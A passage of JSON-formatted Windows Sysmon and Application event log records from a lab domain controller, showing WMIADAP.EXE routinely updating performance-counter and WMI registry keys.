05:50:40.788","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Last Help","Details":"DWORD (0x000063cb)","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4034,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:40.788\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Counter\r\nDetails: DWORD (0x000063ca)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.788","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Counter","Details":"DWORD (0x000063ca)","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4035,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:40.788\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Help\r\nDetails: DWORD (0x000063cb)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.788","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Last Help","Details":"DWORD (0x000063cb)","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1000,"SourceName":"Microsoft-Windows-LoadPerf","ProviderGuid":"{122EE297-BB47-41AE-B265-1CA8D1886D40}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12124,"ProcessID":4532,"ThreadID":876,"Channel":"Application","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Performance counters for the WmiApRpl (WmiApRpl) service were loaded successfully. The Record Data in the data section contains the new index values assigned to this service.","Opcode":"Info","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4036,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:40.788\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Counter\r\nDetails: DWORD (0x00006324)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.788","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Counter","Details":"DWORD (0x00006324)","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4037,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:40.788\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Help\r\nDetails: DWORD (0x00006325)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.788","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\First Help","Details":"DWORD (0x00006325)","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4038,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:40.788\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Object List\r\nDetails: 25380 25386 25396 25406 25426 25470 25480 25518 25524 25540","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.788","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\WmiApRpl\\Performance\\Object List","Details":"25380 25386 25396 25406 25426 25470 25480 25518 25524 25540","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:40","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4039,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteValue\r\nUtcTime: 2020-08-01 05:50:40.788\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:40.788","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Perflib\\Updating","EventReceivedTime":"2020-08-01 05:50:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4040,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Data\r\nDetails: Binary Data","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\PROVIDERS\\Performance\\Performance Data","Details":"Binary Data","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":12,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":12,"OpcodeValue":0,"RecordNumber":4041,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry object added or deleted:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: DeleteKey\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE","Category":"Registry object added or deleted (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4042,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\system32\\kernelbase.dll[MofResourceName]\r\nDetails: LowDateTime:1098060289,HighDateTime:30805949***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\system32\\kernelbase.dll[MofResourceName]","Details":"LowDateTime:1098060289,HighDateTime:30805949***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4043,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\system32\\en-US\\kernelbase.dll.mui[MofResourceName]\r\nDetails: LowDateTime:625866771,HighDateTime:30682635***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\system32\\en-US\\kernelbase.dll.mui[MofResourceName]","Details":"LowDateTime:625866771,HighDateTime:30682635***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4044,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\ACPI.sys[ACPIMOFResource]\r\nDetails: LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\ACPI.sys[ACPIMOFResource]","Details":"LowDateTime:-1594147734,HighDateTime:30671341***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4045,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\ACPI.sys.mui[ACPIMOFResource]\r\nDetails: LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\ACPI.sys.mui[ACPIMOFResource]","Details":"LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4046,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\mssmbios.sys[MofResource]\r\nDetails: LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\mssmbios.sys[MofResource]","Details":"LowDateTime:2077700573,HighDateTime:30531428***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4047,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\mssmbios.sys.mui[MofResource]\r\nDetails: LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\mssmbios.sys.mui[MofResource]","Details":"LowDateTime:-592857982,HighDateTime:30543079***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4048,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\intelppm.sys[PROCESSORWMI]\r\nDetails: LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\intelppm.sys[PROCESSORWMI]","Details":"LowDateTime:-2024749675,HighDateTime:30736945***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4049,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\intelppm.sys.mui[PROCESSORWMI]\r\nDetails: LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 05:50:44.179","ProcessGuid":"{A837DB8D-02A5-5F25-0000-001050FE0500}","Image":"\\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\en-US\\intelppm.sys.mui[PROCESSORWMI]","Details":"LowDateTime:-592701735,HighDateTime:30543079***Binary mof compiled successfully","EventReceivedTime":"2020-08-01 05:50:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":4050,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: Suspicious,ImageBeginWithBackslash\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:50:44.179\r\nProcessGuid: {A837DB8D-02A5-5F25-0000-001050FE0500}\r\nProcessId: 4532\r\nImage: \\\\?\\C:\\Windows\\system32\\wbem\\WMIADAP.EXE\r\nTargetObject: HKLM\\SOFTWARE\\Microsoft\\Wbem\\WDM\\DREDGE\\C:\\Windows\\System32\\drivers\\xeniface.sys[XENIFACEMOF]\r\nDetails: LowDateTime:1504655616,HighDateTime:30789954***Binary mof compiled successfully","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"Suspicious,ImageBeginWithBackslash","UtcTime":"2020-08-01 